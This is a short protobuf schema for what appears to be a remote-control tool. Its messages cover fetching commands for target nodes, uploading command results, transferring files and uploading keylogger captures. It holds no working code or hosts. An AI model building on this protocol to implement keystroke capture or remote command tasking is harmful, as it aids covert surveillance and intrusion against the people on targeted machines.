syntax = "proto3";
option go_package = "protomessages/messages";
package protomessage;

message FetchCommandsRequest {
  repeated Node nodes = 1;
}

message FileTransferRequest {
  string name = 1;
  string uuid = 3;
  int64 size = 2;
}

message FileTransferResponse {
  string addr = 1;
}

message FileTransferError {
  string error = 1;
}

message Commands {
  int64 target = 1;
  string command = 2;
  string uuid = 3;
}

message Node {
  int64 id = 1;
  string host = 2;
}

message FetchCommandsResponse {
  repeated Commands commands = 1;
}

message UploadCommandResult {
  string uuid = 1;
  string result = 2;
}

message UploadKeyLogger {
  string uuid = 1;
  string keys = 2;
}

message ProtoMessage {
  oneof fetch_message {
    FetchCommandsRequest fetchCommandsRequest = 90;
    FetchCommandsResponse fetchCommandsResponse = 91;
    UploadCommandResult uploadCommandResult = 92;
    UploadKeyLogger uploadKeylogger = 93;
    FileTransferRequest fileTransferRequest = 94;
    FileTransferResponse fileTransferResponse = 95;
    FileTransferError fileTransferError = 96;
  }
}
